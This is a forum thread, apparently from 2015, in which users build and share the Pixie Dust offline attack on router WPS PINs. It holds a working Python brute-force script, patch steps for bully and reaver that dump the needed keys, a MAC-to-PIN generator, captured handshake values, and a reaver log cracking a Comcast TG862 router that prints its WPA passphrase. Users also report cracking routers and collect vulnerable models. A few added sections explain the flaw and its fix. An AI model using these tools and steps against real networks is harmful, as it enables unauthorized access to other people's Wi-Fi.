Seems like there's another project on Pixie Dust.
http://www.crack-wifi.com/forum/topi...ns.html#p75984
Only it's in French.
Any natives?
Need to modify bully. That French forum is essentially the same thing as we have on here.
Normally the router should correct the checksum and just admit valid PINs (that respect the rules of the Wi-Fi Alliance); also a few routers were shown to admit non-legitimate PINs (without checksum). @kcdtv
Yeah, I know what you mean referring to the checksum digit: computing it every time or having an array of already pre-computed digits. Could be an option.
In any case bruteforcing 11'000 digits or 20'000 doesn't make any difference on modern processors (after the PRNG seed is bruteforced). Also, if the PIN is chosen by the user, then it's most likely that the checksum won't match (odds are 1/10).
Anyway that's a detail and, as you said, will not make any difference...
The next big challenge is to set up the brute force of the seed for models with a "more complex" pattern than ES-1=ES-2=0.
My English is so-so and I often have difficulties making myself understood in Shakespeare's language. People say English is easy but they are wrong, or it is because they do not mind speaking with faults or imprecisely.

I'm not sure about your question on the AuthKey. It is the key used in the HMAC-SHA-256 hash function and it's 32 bytes (256 bits) long (it's not truncated).
To make an example: E-Hash1 = HMAC_SHA-256{AuthKey [32 bytes]}(ES-1 [16 bytes] || PSK1 [16 bytes] || PKE [192 bytes] || PKR [192 bytes]).
By the way, you exactly answered my questions.
Thanks
I am native and I actually moderate this forum with Spawn ("qolund" here, see message #32).
We are working all together, don't worry about this; if we discover something relevant in crack-wifi.com I will post it as soon as possible here in English.
wiire did half of the job by
1) making the first public attack vs Ralink
2) coding the "Ralink" case ES-1=ES-2=NULL
We need to do the second half:
1) making the first attack vs Broadcom
2) coding the Broadcom case where brute force of the PRNG is needed
and we are all there basically... Yesterday we made half of the way.
I also opened a thread on a Spanish forum to get more collaboration (but we just started it, it is still not officially launched and we are 2 admins with 2 users).
Anyway, if something comes out one way or the other it will be known here immediately.
Let's keep on the good work! Cheers to everybody.
Let me quote part of the WPS specification document (hope I'm allowed):
"For 8-digit numeric PINs, the last digit in the PIN is used as a checksum of the other digits. This has the disadvantage of reducing the entropy of the PIN. It has the advantage, however, of enabling errors in user input of the PIN to be detected and potentially corrected before the PIN is actually used in the Registration Protocol. Users of course are not expected to compute checksums for passwords they choose, so user-specified Device Passwords do not include a checksum digit."
"Checksum digits are only included and validated for the Default (PIN) device password type, and only if an 8-digit PIN is used."
You may be right but of course, vendors do what they want... we know. I saw PINs that didn't match the checksum too. I'll add the checksum optimization soon.
English IS difficult, a new language is. That's why Esperanto was invented. By the way, I'm a non-native speaker. I learned English (mostly) on the Internet so my speaking could be a bit misleading sometimes.
Last edited by wiire; 2015-03-20 at 18:05.
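The checksum rule quoted from the specification above, as an added example (my code, not from the thread or from any of the tools discussed): it computes the check digit the same way ComputePIN's loop does, validates an 8-digit default PIN, and checks two things the spec text only hints at: every single-digit typo is caught, while an adjacent swap of two digits that differ by 5 is not. The 1/10 figure for user-chosen PINs is estimated over a seeded random sample.

```python
import random

# Added example, not code from the thread. The check digit covers the first seven
# digits with alternating weights 3 and 1, starting from the least significant.


def wps_pin_checksum(first_seven: int) -> int:
    """Check digit for a 7-digit PIN body (same arithmetic as ComputePIN's while loop)."""
    if not 0 <= first_seven <= 9_999_999:
        raise ValueError("PIN body must have at most 7 digits")
    accum, n = 0, first_seven
    while n:
        accum += 3 * (n % 10)
        n //= 10
        accum += n % 10
        n //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if an 8-digit PIN carries the right check digit. Per the spec text only
    8-digit Default (PIN) passwords are checksummed, so anything else is rejected here."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return int(pin[7]) == wps_pin_checksum(int(pin[:7]))


def single_digit_errors_detected(pin: str) -> bool:
    """Every single-digit typo in a valid PIN fails the check: both weights (1 and 3)
    are coprime to 10, so changing one digit always moves accum mod 10."""
    for pos in range(8):
        for d in "0123456789":
            if d != pin[pos] and is_valid_wps_pin(pin[:pos] + d + pin[pos + 1:]):
                return False
    return True


def undetected_transpositions(pin: str) -> list:
    """Adjacent swaps inside the 7-digit body that still pass: swapping digits with
    weights 3 and 1 changes accum by 2*(a-b), which is 0 mod 10 when |a-b| == 5."""
    found = []
    for pos in range(6):
        a, b = pin[pos], pin[pos + 1]
        swapped = pin[:pos] + b + a + pin[pos + 2:]
        if a != b and is_valid_wps_pin(swapped):
            found.append(swapped)
    return found


def fraction_of_random_pins_valid(trials: int, seed: int = 1) -> float:
    """Share of uniformly random 8-digit PINs (a user-chosen PIN, say) that pass
    the check; the expectation is 1/10, the figure given in the thread."""
    rng = random.Random(seed)
    ok = sum(is_valid_wps_pin(f"{rng.randrange(10**8):08d}") for _ in range(trials))
    return ok / trials


if __name__ == "__main__":
    print("12345670 valid:", is_valid_wps_pin("12345670"))
    print("single-digit typos caught:", single_digit_errors_detected("12345670"))
    print("swaps that slip through 16345676:", undetected_transpositions("16345676"))
    print("random PINs passing:", fraction_of_random_pins_valid(2000))
```

The practical consequence for a registrar that enforces the checksum is the one wiire mentions: it removes one digit of entropy from default PINs but also lets a router reject most mistyped or user-chosen 8-digit passwords before they reach the registration protocol.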
@wiire, so when will we be able to try your tool? Can you send your e-mail via PM? Thanks
Soon hopefully. I'm kinda busy at the moment. I'll host the code on GitHub and make a new thread with a tutorial when completed or available for "beta testing". Let's stick to the thread's subject for now. If someone has information or suggestions on the PRNG attack, please share.
I just know one case of a router model that has a default PIN that doesn't respect the checksum rule; it was used by Telefónica (Spanish ISP) and it is the "Amper" ASL-26555.
Originally Posted by wiire
Otherwise I always saw default PINs that respect the checksum rules.
For the checksum, if you need any help I can explain every step to you in detail.
This is the ZhaoChunsheng C code called ComputePIN; at the end you can see the function he uses to generate the checksum with a while loop.
Code:
#include <stdio.h>
#include <stdlib.h>

/* WPS check digit over the 7-digit PIN body: weights 3 and 1 alternate,
   starting from the least significant digit. */
unsigned int wps_pin_checksum(unsigned int pin);

int main(void)
{
    unsigned int PIN = 0;
    printf("ComputePIN-C83A35\n");
    printf("Description:\n");
    printf("If your wireless router MAC address start with \"C83A35\",\n");
    printf("type the other six digits, you might be able to get the \n");
    printf("WPS-PIN of this equipment, please have a try, good luck!\n\n");
    printf("Code by ZhaoChunsheng 04/07/2012 http://iBeini.com\n\n");
    printf("Input MAC Address(HEX):c83a35");
    scanf("%x", &PIN);                  /* last 24 bits of the MAC, as hex */
    printf("MAC Address(HEX) is: C83A35%X\n", PIN);
    /* PIN body = MAC value mod 10^7, then the check digit is appended */
    printf("WPS PIN is: %07u%u\n", PIN % 10000000, wps_pin_checksum(PIN % 10000000));
    return 0;
}

unsigned int wps_pin_checksum(unsigned int pin)
{
    unsigned int accum = 0;
    while (pin) {
        accum += 3 * (pin % 10);
        pin /= 10;
        accum += pin % 10;
        pin /= 10;
    }
    return (10 - accum % 10) % 10;
}
If someone has information or suggestions on the PRNG attack, please share.
This PDF is VERY interesting: it is really focused on brute force issues vs Diffie-Hellman.
Exploring Diffie-Hellman Encryption
Anyone who has an XFINITY gateway... what are your model numbers? Seems like Comcast might have a HUGE problem to deal with soon...
Can you post a mirror of the link?
Thanks
code removed
Last edited by datahead; 2015-03-23 at 17:01.
code removed
Last edited by datahead; 2015-03-23 at 17:02.
Hey, can anyone share the method of extracting
- PKE
- PKR
- AuthKey
- E-Hash1
- E-Hash2
from cap files?
@datahead
I didn't learn C or cryptology (or maths) this weekend so I don't really get the details... (at all)
If I understand well, vendors may have used this "random function":
http://opencores.org/ocsvn/openrisc/...t/src/rand.cxx
Thank you for sharing your code, great job.
Last edited by kcdtv; 2015-03-23 at 14:24.
Hi Guys,
I have coded the Pixie Dust Attack just when ES1=ES2=0 for Ralink devices. I have used the C code as test vector for the input data.
You can find it here : https://bitbucket.org/dudux/wpsoffline/
I am running out of time, but I would like to implement the brute force of the PRNG state for Broadcoms. After all, I would like to translate it to C into Reaver or bully. But surely someone is a better C programmer and has more time than me.
Code:
import hashlib
import hmac

# Test vectors from the Ralink capture: 192-byte DH public keys, the two
# enrollee hashes and the derived AuthKey (all hex, decoded to bytes).
PK_E = bytes.fromhex(
    "11e11709c0836c10e5a93a415f7869c5351f7218ab68867c3a1f8dbb9b8f984c"
    "e0eabcbfd212fdc04fd9b3675e9dd9578d53ed5904177bdbe4fe64008a4a47de"
    "50e7fc6409dc750b295565f54f1fe78582d78de0fac72675677cb1c85c5ca46a"
    "5fced284ad79a27b4c38038b207ee76d3d556d7c3606310e52f5c6123a1f4997"
    "6566cc21c31d40e5412decb2712d07667ac0803b21ca1df15f8f25814dc313cf"
    "7bcdffeac436b5f2d40ceb18df5d90ac1e545eddd43ec7e78d4970d313a65746")
PK_R = bytes.fromhex(
    "531ff143e7ef3663de555704904fbe5417a2b465f175cf55e01ab94cff9156d3"
    "b6c272d1315fa70c4719897cea28f984ba0eccf22e86f48d4f8a275fcc78e37a"
    "b81e917a376e038595ab980d57898224aed228052f29efa6299f11cd4d7aa562"
    "b7baf1404ae8a15b70c130718cb1e0db6a32af3be2eb073927ef414ea2fd5ced"
    "6595a95c5e28fa3badf69ddb15f9f74deb1690139122eab14f99adc9d360f7d4"
    "f066fab35b77a46eb7286172eae8dd7eda768849307f9b00f06d69571b9da243")
eHash1 = bytes.fromhex("c14b83a3415999bba082f467872fd4bc9b79778b33d1d20cab55cb7d0b96cf43")
eHash2 = bytes.fromhex("3516ace7cd46bcbcac83b3065be66a89186a54da8800d336041e8ab847929416")
AuthKey = bytes.fromhex("d5c7e4a9fb5911b31dcbf80db712b34ed71a9218c9c111992c60d883e197e9ea")

# Ralink case: ES1 = ES2 = 0. If ES1, ES2 are found out, recover the halves of the PIN.
es1 = es2 = b"\x00" * 16

for first_half in range(10000):
    # PSK1 = first 16 bytes of HMAC_AuthKey(first four PIN digits, as ASCII)
    PSK1_guess = hmac.new(AuthKey, str(first_half).zfill(4).encode(), hashlib.sha256).digest()[:16]
    eHash1_guess = hmac.new(AuthKey, es1 + PSK1_guess + PK_E + PK_R, hashlib.sha256).digest()
    if eHash1 == eHash1_guess:
        # First half done
        for second_half in range(10000):
            PSK2_guess = hmac.new(AuthKey, str(second_half).zfill(4).encode(), hashlib.sha256).digest()[:16]
            eHash2_guess = hmac.new(AuthKey, es2 + PSK2_guess + PK_E + PK_R, hashlib.sha256).digest()
            if eHash2 == eHash2_guess:
                print("PIN FOUND! %04d%04d" % (first_half, second_half))
                # doWPSprotocolWithPINguessed()  # TODO
                raise SystemExit
Proost!
I forgot to say that I blindly implemented the attack in the proof-of-concept "wpscrack.py". It is only useful for Ralink devices such as TP-LINK routers.
I have not tested the attack live! This code does the right offline bruteforcing. However, IT HAS NOT BEEN TESTED YET! Feel free to tweak it as you wish or do commit requests.
Usage:
wpscrack_mod:$ sudo python wpscrack.py -i mon0 -b [BSSID] -s [ESSID] --offline -vv
Updated with a database in the original post
dudux, it says "PIN FOUND! 57334196" all the time, for every router.
Still Attack not available for BroadCom ..
You need to edit the file and put your own data. I don't know where the PKR, PKE data is in the packets, that's where I'm stuck.
Tried the tool and it is giving me:
Code:
Trying 00000000 -> 802.11 deauthentication -> 802.11 authentication request TIMEOUT!!
But I'm trying against Broadcom and not Ralink; as said above, Broadcom is not implemented yet.
I hope you guys keep developing this subject, it's very interesting but beyond my personal understanding to put into practice, so I'll have to wait.
Would it be feasible to add an import-from-cap feature? I guess that would get some testers running. Thanks everyone
@everyone There is NO official and complete tool available yet. Stop asking. When it is available, one of us will make a post.
@dudux was the realtek.cap file what you used to make wpsOffline.py? Unless I'm doing it wrong, I'm not getting the same PKE, PKR, or any of it.
SMCD3GNV and WRT160Nv2 confirmed vulnerable!
The tool works, I have corrected the code now.
@soxrok2212
Cracked 3 routers
and all of them were right.
Can you post the model numbers, manufacturers, and hardware numbers so I can add it to the database?
Dudu has asked me to post a python implementation for Ralink devices! You can get it here: https://bitbucket.org/dudux/wpsoffli...e.py?at=master
All credits go to dudu! Look at the help section for the arguments. Good luck and post any successes with models here! Thanks!!!!
Last edited by soxrok2212; 2015-03-26 at 18:52.
Tried the tool also and it is only giving the same results, but I am trying against a Ralink TP-LINK router. Unmodified code does the same.
Looking through the Wireshark logs, it is attempting to authenticate, but the script isn't recognizing that it is getting a response. I don't really
know enough about Python to dig into it, more of a Perl guy than Python. Starting to learn it though. Trying to extract the part in wpscrack.py
that creates the AuthKey and feed it what it wants to spit out the AuthKey, if that's even going to work... From what I am reading about the
KDK it only partially makes sense to me.
Tried the modified version of bully also, it just seems to run normally, trying PINs and moving on to the next. Still confused on how this is
supposed to give the AuthKey, which is where I am stuck. I assume it doesn't give it to you automatically, so how do you get it to give
the AuthKey?
I can get everything else as it's in plain sight. I have a couple of Ralink routers at my disposal to test this on also.
I thought it wasn't obtained from Wireshark and you had to run it through the KDK... That just confused me even more...
Code:
maingroup.add_argument('-ak', '--AuthKey', type=str, nargs='?', help='AuthKey obtained from wireshark')
WPSCrack.py I guess only works with Atheros wireless adapters. Try this to get more info. It comes from Hack Forums:
1: Raise the debug level in the (wpa_supplicant) source:
Code:
int wpa_debug_level = MSG_INFO; // change it to MSG_DEBUG
2: Or, manually add some prints in the (wpa_supplicant) source. Let's take as an example bully (you could try reaver if you wish):
- Download the zip file. Unzip it.
- Go to bully-master/src/wps and open wps_common.c with a text editor.
- Go to line 122 and add something similar (just a print):
Code:
os_memcpy(wps->emsk, keys + WPS_AUTHKEY_LEN + WPS_KEYWRAPKEY_LEN, WPS_EMSK_LEN);
/****** ADD THIS PART ******/
printf(" > AuthKey: ");
int pixiecnt = 0;
for (; pixiecnt < WPS_AUTHKEY_LEN; pixiecnt++) {
    printf("%02x", *(wps->authkey + pixiecnt));
    if (pixiecnt != WPS_AUTHKEY_LEN - 1) {
        printf(":");
    }
}
printf("\n");
/******/
wpa_hexdump_key(MSG_DEBUG, "WPS: AuthKey",
- Now open wps_registrar.c.
- Go to line 1719 (inside the wps_process_e_hash1 function) and add:
Code:
wpa_hexdump(MSG_DEBUG, "WPS: E-Hash1", wps->peer_hash1, WPS_HASH_LEN);
/****** ADD THIS PART ******/
printf(" > E-Hash1: ");
int pixiecnt = 0;
for (; pixiecnt < WPS_HASH_LEN; pixiecnt++) {
    printf("%02x", *(wps->peer_hash1 + pixiecnt));
    if (pixiecnt != WPS_HASH_LEN - 1) {
        printf(":");
    }
}
printf("\n");
/******/
return 0;
- Then in the function below (inside wps_process_e_hash2) add:
Code:
wpa_hexdump(MSG_DEBUG, "WPS: E-Hash2", wps->peer_hash2, WPS_HASH_LEN);
/****** ADD THIS PART ******/
printf(" > E-Hash2: ");
int pixiecnt = 0;
for (; pixiecnt < WPS_HASH_LEN; pixiecnt++) {
    printf("%02x", *(wps->peer_hash2 + pixiecnt));
    if (pixiecnt != WPS_HASH_LEN - 1) {
        printf(":");
    }
}
printf("\n");
/******/
return 0;
Then please post this here:
Code:
AP Manufacturer:
Model name/number:
Chipset:
N1 Nonce:
Authkey:
PKE:
PKR:
E-Hash1:
E-Hash2:
First 3 are optional, last 6 are mandatory to crack.
Last edited by soxrok2212; 2015-03-26 at 21:20.
Yeah, the AuthKey is generated, sorry I just copied & pasted.........
The code is right here. I guess that the community will release a fresh & quick patch for reaver or bully. Be patient and try to understand the flaw itself!
Code:
# Excerpt from the registrar class in wpscrack.py: bignum_unpack/bignum_pack,
# kdf and the prime_int/secret_number attributes are defined elsewhere in the script.
def gen_keys(self):
    pubkey_enrollee = self.bignum_unpack(self.PK_E)
    pubkey_registrar = pow(2, self.secret_number, self.prime_int)
    # Diffie-Hellman shared secret from the enrollee's public key (PKE)
    shared_key = self.bignum_pack(pow(pubkey_enrollee, self.secret_number, self.prime_int), 192)
    self.PK_R = self.bignum_pack(pubkey_registrar, 192)
    self.RNonce = os.urandom(16)
    DHKey = hashlib.sha256(shared_key).digest()
    # KDK = HMAC_DHKey(N1 || EnrolleeMAC || N2), then the WPS KDF splits it into three keys
    KDK = hmac.new(DHKey, self.ENonce + self.EnrolleeMAC + self.RNonce, hashlib.sha256).digest()
    self.AuthKey, self.KeyWrapKey, self.EMSK = self.kdf(KDK, 'Wi-Fi Easy and Secure Key Derivation', [256, 128, 256])
    self.R_S1 = '\00' * 16  # random enough
    self.R_S2 = '\00' * 16
    # PSK1/PSK2 commit to the two PIN halves; R-Hash1/2 are the registrar's hashes over them
    self.PSK1 = hmac.new(self.AuthKey, self.pin[0:4], hashlib.sha256).digest()[:16]
    self.PSK2 = hmac.new(self.AuthKey, self.pin[4:8], hashlib.sha256).digest()[:16]
    self.RHash1 = hmac.new(self.AuthKey, self.R_S1 + self.PSK1 + self.PK_E + self.PK_R, hashlib.sha256).digest()
    self.RHash2 = hmac.new(self.AuthKey, self.R_S2 + self.PSK2 + self.PK_E + self.PK_R, hashlib.sha256).digest()
Last edited by dudux; 2015-03-26 at 22:32.
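The key derivation in gen_keys() above and wiire's E-Hash1 formula earlier in the thread, worked through end to end as an added example (my code, not the thread's, not dudux's wpsoffline/wpscrack and not wiire's tool). It fills in the kdf() body that gen_keys() only calls, using the counter-mode HMAC-SHA256 KDF the WPS specification defines, runs the Diffie-Hellman exchange for both parties so both AuthKeys can be compared, lets the registrar verify the enrollee's hashes with the right PIN, and then shows the root cause of the Pixie Dust flaw: with E-S1 = 0 the hash commits to only 10^4 possible values, whereas the same search against an enrollee that draws E-S1 from a real CSPRNG finds nothing. The enrollee MAC, nonces and PIN are constructed; the prime is the 1536-bit MODP group (RFC 3526 group 5) that WPS uses.

```python
import hashlib
import hmac
import secrets

# Added example; not code from the thread, from dudux's wpsoffline/wpscrack
# or from wiire's tool. Nonces, MAC address and PIN below are constructed.

# 1536-bit MODP prime (RFC 3526 group 5), the Diffie-Hellman group WPS uses; g = 2.
WPS_PRIME = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74"
    "020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437"
    "4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
    "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF05"
    "98DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB"
    "9ED529077096966D670C354E4ABC9804F1746C08CA237327FFFFFFFFFFFFFFFF", 16)
KDF_LABEL = b"Wi-Fi Easy and Secure Key Derivation"
ZERO_NONCE = b"\x00" * 16  # the ES-1 = ES-2 = 0 (Ralink) case discussed in the thread


def wps_kdf(kdk: bytes, total_bits: int = 640) -> bytes:
    """Concatenate HMAC-SHA256(KDK, be32(i) || label || be32(total_bits)) for i = 1, 2, ..."""
    out = b""
    for i in range(1, (total_bits + 255) // 256 + 1):
        msg = i.to_bytes(4, "big") + KDF_LABEL + total_bits.to_bytes(4, "big")
        out += hmac.new(kdk, msg, hashlib.sha256).digest()
    return out[: total_bits // 8]


def derive_keys(shared_secret: int, n1: bytes, mac_e: bytes, n2: bytes):
    """DHKey = SHA256(g^ab); KDK = HMAC_DHKey(N1 || MAC_E || N2);
    KDF(KDK) = AuthKey (256 bits) || KeyWrapKey (128) || EMSK (256)."""
    dhkey = hashlib.sha256(shared_secret.to_bytes(192, "big")).digest()
    kdk = hmac.new(dhkey, n1 + mac_e + n2, hashlib.sha256).digest()
    keys = wps_kdf(kdk)
    return keys[:32], keys[32:48], keys[48:80]


def e_hash(authkey: bytes, es: bytes, pin_half: str, pke: bytes, pkr: bytes) -> bytes:
    """E-Hash = HMAC_AuthKey(E-S || PSK || PKE || PKR), PSK = HMAC_AuthKey(PIN half)[:16]."""
    psk = hmac.new(authkey, pin_half.encode(), hashlib.sha256).digest()[:16]
    return hmac.new(authkey, es + psk + pke + pkr, hashlib.sha256).digest()


def dh_keypair():
    """Fresh private exponent and the matching 192-byte public value."""
    priv = secrets.randbelow(WPS_PRIME - 2) + 1
    return priv, pow(2, priv, WPS_PRIME).to_bytes(192, "big")


def simulate_m1_to_m3(pin: str, es1: bytes, es2: bytes) -> dict:
    """Enrollee (AP) and registrar run M1..M3; returns what a capture shows
    (PKE, PKR, E-Hash1, E-Hash2) plus the AuthKey each side derived."""
    mac_e = bytes.fromhex("021122334455")                      # constructed enrollee MAC
    n1, n2 = secrets.token_bytes(16), secrets.token_bytes(16)  # N1 (M1) and N2 (M2)
    priv_e, pke = dh_keypair()
    priv_r, pkr = dh_keypair()
    ss_e = pow(int.from_bytes(pkr, "big"), priv_e, WPS_PRIME)  # enrollee: PKR^a
    ss_r = pow(int.from_bytes(pke, "big"), priv_r, WPS_PRIME)  # registrar: PKE^b
    authkey_e, _, _ = derive_keys(ss_e, n1, mac_e, n2)
    authkey_r, _, _ = derive_keys(ss_r, n1, mac_e, n2)
    return {"authkey_e": authkey_e, "authkey_r": authkey_r, "pke": pke, "pkr": pkr,
            "ehash1": e_hash(authkey_e, es1, pin[:4], pke, pkr),
            "ehash2": e_hash(authkey_e, es2, pin[4:], pke, pkr)}


def registrar_accepts(sim: dict, pin: str, es1: bytes, es2: bytes) -> bool:
    """Registrar-side check of the enrollee's hashes once E-S1/E-S2 are revealed (M5/M7)."""
    k, pke, pkr = sim["authkey_r"], sim["pke"], sim["pkr"]
    return (hmac.compare_digest(sim["ehash1"], e_hash(k, es1, pin[:4], pke, pkr)) and
            hmac.compare_digest(sim["ehash2"], e_hash(k, es2, pin[4:], pke, pkr)))


def offline_half_search(authkey: bytes, ehash: bytes, pke: bytes, pkr: bytes, es_guess: bytes):
    """If E-S is predictable (guessed zero here) the hash commits to only 10^4 values, which
    is the whole flaw; with 128 random bits in E-S the same loop returns None."""
    for half in range(10000):
        if hmac.compare_digest(ehash, e_hash(authkey, es_guess, f"{half:04d}", pke, pkr)):
            return f"{half:04d}"
    return None


if __name__ == "__main__":
    weak = simulate_m1_to_m3("12345670", ZERO_NONCE, ZERO_NONCE)
    print("zero E-S1, first half:", offline_half_search(weak["authkey_e"], weak["ehash1"], weak["pke"], weak["pkr"], ZERO_NONCE))
    good = simulate_m1_to_m3("12345670", secrets.token_bytes(16), secrets.token_bytes(16))
    print("random E-S1, first half:", offline_half_search(good["authkey_e"], good["ehash1"], good["pke"], good["pkr"], ZERO_NONCE))
```

The search needs AuthKey, which is why every post in this thread asks for it alongside PKE, PKR and the two hashes: AuthKey comes out of the Diffie-Hellman result, so only a party to the exchange (the registrar the tool is acting as) can compute it. The hardening is entirely on the enrollee side, in how E-S1 and E-S2 are generated.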
Thanks for the script Dudux, worked for me on a belkin F5D8236-4 v3.
@h4x0rm1k3: which script did you use?
Well Explained Pixie Dust Attack in This Document...
http://www.fileconvoy.com/dfl.php?id...611e6156c2908c
Really?
....Did you read the first post of this thread?
Exactly: wpscrack doesn't work with USB adapters (although I didn't try with "the" USB Atheros chipset, ath9k_htc).
Originally Posted by soxrok2212
It is, according to me, the worst and least interesting option (compared to reaver or bully).
cheers
Last edited by kcdtv; 2015-03-29 at 01:33.
Confirmed to work with TG862 v5
Trying to find a bit more automation in this, because what I have to do now to get it to work is kind of a pain...
Code:
PK_E = "1fa58df039d88bd13c4fce5dddf90dc5062f33f3d853e1675c793c5c0039102c3a9c82041e366f3e7fef39d050340bb134ce4c0c628657ecf48bb64bfea172409b21dfb760ab2c0b41d5577860c99a8625f06a8dc7e20c866c1656f1e94b37873e80b137a33b265149574a3a55183a6665d9ade3bce174a2f2e24c3bba1f6d53adaf75d8d966952772decbb776aeb43a7b1291f3f4e57572ffccd16ee81f74fc05f257fc1a7d98bdc8e31e81653119cf0f2f20db1744c3b503be7e8f11975148"
PK_R = "84bda17b3566d94551e34222eb01f1302bd3f57efddd8facddb14e2ddeddd616794e51a99e084d6c0f90bfea1fce7bdb7ce0951c04820a39685117ce9f4c54111d48c69318e9269ed4a4d77112b34418825517a9a772ddb448278ec849ec7177fcb8a925ba1ce34579a712af5e964a8394ef09c38bc34878ee965cbaa890cf0bf3a2500dd455193cf8d0443a65fdebb2312cae514968bf4090423795860fa5b419ff61f37ef25d2af364fabec0da547241e794e1b2ca7562aec072bcd76b9218"
eHash1 = "991ea46545f722945b7e356f58549264773a2d08b39129ee43ba818518044842"
eHash2 = "e2b5ca0c9534d1dceb41327000d5e00ce973c27071726088b8b4c89d3c7ba487"
AuthKey = "cbaa229e34bb288167c3412e5c9c32478a897e16cce47b8e3c4de9ef4eb2fcdb"
Musket Teams have done the rewrite of bully as suggested in a thread above. One computer seems to provide all five keys; another computer only provides the keys -authkey, hash1 and hash2, and only if the -o command is in the bully command line (i.e. write to file). It then appears on the screen, not in the file. In this case you must also run Wireshark to get the -pke and -pkr.
You must download the source file, rewrite the two files in the install package, then reinstall. If during reinstall you get a pcap.h warning then:
sudo apt-get install libpcap-dev
Then reinstall. The method for reinstall is found in the README.md.
If you are trying to rewrite reaver (our team is working on this as we speak), note that the wps_common.c file works for both reaver and bully BUT the wps_registrar.c is different. You must rewrite each version of wps_registrar.c. The same command lines to change exist, but the reaver file has file links not found in bully, causing the install to fail if the bully version is used.
MTeams
Last edited by soxrok2212; 2015-03-29 at 12:55.
@soxrok2212 yes I did test the pin and it did work. Oddly enough I seem to be getting the same pin for multiple routers. The ones that have the default essid of HOME-XXXX all seem to be producing the same pin. I've only tested it on that one so far. Could xfinity have given the same pin to all the tg862 routers? That would be a MAJOR oops!
Just checked the configuration of the router and the pin DOES NOT match. The pin in the configuration was 84237446
Screenshot2.png
But attempting 42000648 does indeed work!
But attempting the PIN in the configuration doesn't work. And unless I am looking at this wrong, in the screenshot above, isn't WPS PIN entry disabled?
Code:
root@kali:~/Desktop# reaver -b 00:AC:E0:3E:DB:10 -vv -i mon0 -p 42000648
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Waiting for beacon from 00:AC:E0:3E:DB:10
[+] Switching mon0 to channel 6
[+] Associated with 00:AC:E0:3E:DB:10 (ESSID: HOME-XXXX)
[+] Trying pin 42000648
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 9 seconds
[+] WPS PIN: '42000648'
[+] WPA PSK: 'basket1744chase'
[+] AP SSID: 'HOME-XXXX'
[+] Nothing done, nothing to save.
Last edited by aanarchyy; 2015-03-29 at 16:57. Reason: Typo
I'm glad you tested it however, that is extremely weird. Perhaps Comcast uses this same undiscovered pin (until now) on all their TG862 models...?
I just had this same thing happen with a TG862
M1 wps.enrollee_nonce : bd2fb84d8cd392268432a86692f45081
M1 wps.public_key : 26523c5c10fbecb8dacebd499b943381dd5d959a19b0dd3de6d6092296be009f6d0043e0d0468b6169640a42c2a755451d6aa21c0c9fa581868ffc39cb9b9dd61f75f2d1b37b10724fe5263f2f0ef51d447a37c04d3634b3cadb864209b6288276daa19310c1414162af40da6d5cf524791ce746fb4e6bb044fe531683a4f57cd4e864a4beb6b9e397c10f1b2673306ef6ccb81e8cff0086cbbddb546d2e33a4ce02f305d36f1a6d3e6a075dace5e454a7b7fc41b9df1a4739b67c071da0b4ba
M2 wps.enrollee_nonce : bd2fb84d8cd392268432a86692f45081
M2 wps.public_key : 1c5abc81aa3b2e019322275d81fdba8d781a670c7bbb2e72f141b9559fba622f1d664a2d088f3d86aec4ac054d8fe32afa615c44641e0b87736f5f533edbf4c2c170d38fab28aaadecb812687b1d69f5314179c1b8c71d5f6302788a112826cb2e359703d4039a9ee4c2c7d8f3cc2174db2738f67cc64677111d99568042d38748fd0963cabda0ee6c2eb911d428647b9401df6d4ac75e7c9d57ddcf914bcf18f9dd138b3a09726b5c906f6a539cbecab2fc2acd415168e424d4cd45db6f8008
M2 wps.registrar_nonce : bdb64e739ce8e78915d839945a6a4882
M2 wps.authenticator : 25706c21a1637948
M3 wps.registrar_nonce : bdb64e739ce8e78915d839945a6a4882
M3 wps.authenticator : 8c8ac40a5d2fba7c
M3 wps.e_hash1 : 40d578a860d7c7b7fa9164734821be696de11dde1026b62e586027685d44bda6
M3 wps.e_hash2 : 47f0d473cbb32fee2ebe20ce4f151c15a17d6b7695fa536ed7779369de8e6a81
M4 wps.enrollee_nonce : bd2fb84d8cd392268432a86692f45081
M4 wps.authenticator : d1a7f72e8569b045
M4 wps.encrypted_settings : 97e680a1c5c31d6ff777219bb0f1928cdbc056f38f894530cff61b317343cd599b2a3501a7defe012fcab40097efa202e9277d5605bfa84e62be20b985db5797
M4 wps.r_hash1 : a9def4675aa789fe6f6d1cbb2e5a428184690698a6a65f9a8005c147b5cd73a1
M4 wps.r_hash2 : 2b84cb17f955b22fe165c4bfa2b81a0d41ae7681960269063fc7e11fd48660dc
Client wps.manufacturer :
Client wps.device_name :
Client wps.os_version : 2147483648
Client wlan.ta : 00:19:e3:06:7e:44
Client wps.model_name :
Client wps.model_number :
Client wps.serial_number :
AP wps.manufacturer : ARRIS
AP wps.device_name : ARRIS TG862 Router
AP wps.os_version : 2147483648
AP wlan.ta : 00:1d:d6:ab:8f:40
AP wps.model_name : TG862G
AP wps.model_number : RT2860
AP wps.serial_number : 12345678
Additionally, it appears to receive the credentials and then fail the WPS?
<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE
<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE
<3>SME: Trying to authenticate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
<3>Trying to associate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
<3>Associated with 00:1d:d6:REDACTED
<3>CTRL-EVENT-EAP-STARTED EAP authentication started
<3>CTRL-EVENT-EAP-PROPOSED-METHOD vendor=14122 method=1
<3>CTRL-EVENT-EAP-METHOD EAP vendor 14122 method 1 (WSC) selected
